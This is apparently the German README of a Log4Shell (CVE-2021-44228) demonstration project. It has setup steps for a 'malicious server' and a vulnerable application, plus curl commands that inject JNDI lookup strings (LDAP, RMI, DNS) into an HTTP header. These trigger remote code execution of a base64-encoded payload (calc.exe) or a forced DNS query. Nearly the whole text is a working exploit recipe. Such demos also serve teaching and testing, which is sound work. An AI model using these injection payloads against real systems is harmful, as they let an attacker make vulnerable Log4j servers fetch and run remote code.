
Log4j CVE-2021-44228 Beispiele: Remote-Code-Ausführung (über LDAP, RMI, ...), erzwungene DNS-Abfragen, ...
Verwenden Sie ein verwundbares JDK, zum Beispiel JDK 1.8.0_181
Der bösartige Server stellt die folgenden Endpunkte bereit:
./gradlew :malicious-server:bootRun
Die verwundbare Anwendung stellt einen HTTP-Endpunkt auf 8082 bereit.
./gradlew :vulnerable-app:bootRun
Wählen Sie einen Payload, der von der verwundbaren Anwendung ausgeführt werden soll, und kodieren Sie ihn in Base64. Um beispielsweise den Taschenrechner unter Windows zu öffnen: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/